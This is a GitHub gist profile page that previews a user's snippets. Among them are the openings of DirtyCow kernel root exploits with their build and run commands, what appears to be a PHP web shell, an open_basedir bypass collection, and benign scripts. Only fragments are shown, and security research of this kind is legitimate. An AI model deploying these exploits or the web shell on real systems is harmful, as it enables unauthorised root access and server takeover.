Skip to content

Instantly share code, notes, and snippets.

View code-scan's full-sized avatar
🏍️
On vacation

Cond0r code-scan

🏍️
On vacation
512 followers · 71 following
View GitHub Profile
@code-scan
code-scan / clear_cookie.js
Created July 14, 2016 12:02
删除当前域名下的suoyoucookie
@code-scan
code-scan / clear_cookie_jd.js
Created July 14, 2016 14:05
@code-scan
code-scan / cowroot.c
Last active November 7, 2016 06:48
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten
@code-scan
code-scan / dirtycow-mem.c
Created November 7, 2016 06:58
/*
* CVE-2016-5195 dirtypoc
*
* This PoC is memory only and doesn't write anything on the filesystem.
* /!\ Beware, it triggers a kernel crash a few minutes.
*
* gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread
*/
#define _GNU_SOURCE
@code-scan
code-scan / scan.online.py
Created November 16, 2017 16:40
#coding=utf-8
import platform
import sys
import os
import time
import thread
def get_os():
'''
get os 类型
@code-scan
code-scan / WeChat_Pay_Bill_Export.py
Created January 9, 2017 22:28 — forked from alanzchen/WeChat_Pay_Bill_Export.py
WeChat Pay Bill Export
import requests
import datetime
# Simply call get_record and it will return a json object containing your bill.
# Replace them with your credentials. You can get all these credentials by capturing packets from WeChat app when viewing your bill. Hint: Surge.app can be very helpful.
exportkey = "xxxxxx"
cookie = "export_key=xxxxx; userroll_pass_ticket=xxxxxx"
last_id = "xxxxx"
@code-scan
code-scan / spy.php
Created December 11, 2018 05:24
<?php
error_reporting(7);
//@set_magic_quotes_runtime(0);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
define('IS_COM', class_exists('COM') ? 1 : 0 );
define('IS_GPC', get_magic_quotes_gpc());
@code-scan
code-scan / adminer.php
Created December 11, 2018 05:37
<?php
/** Adminer - Compact database management
* @link https://www.adminer.org/
* @author Jakub Vrana, https://www.vrana.cz/
* @copyright 2007 Jakub Vrana
* @license https://www.apache.org/licenses/LICENSE-2.0 Apache License, Version 2.0
* @license https://www.gnu.org/licenses/gpl-2.0.html GNU General Public License, version 2 (one or other)
* @version 4.7.0
*/error_reporting(6135);$tc=!preg_match('~^(unsafe_raw)?$~',ini_get("filter.default"));if($tc||ini_get("filter.default_flags")){foreach(array('_GET','_POST','_COOKIE','_SERVER')as$X){$Zg=filter_input_array(constant("INPUT$X"),FILTER_UNSAFE_RAW);if($Zg)$$X=$Zg;}}if(function_exists("mb_internal_encoding"))mb_internal_encoding("8bit");function
connection(){global$g;return$g;}function
@code-scan
code-scan / tbot.js
Last active December 25, 2018 10:44
const TeleBot = require('telebot');
var request=require("request");
var fs = require("fs");
var path = require("path");
var iconv = require('iconv-lite');
var moment = require('moment');
var dbstatus=false;
var status=true;
var deltime=60000;
moment.locale('zh-cn');
@code-scan
code-scan / open_basedir_bypass.php
Created April 23, 2019 14:00
open_basedir_bypass
<?php
/*
PHP open_basedir bypass collection
Works with >= PHP5
By /fd, @filedescriptor(https://twitter.com/filedescriptor)
*/
// Assistant functions
function getRelativePath($from, $to) {
// some compatibility fixes for Windows paths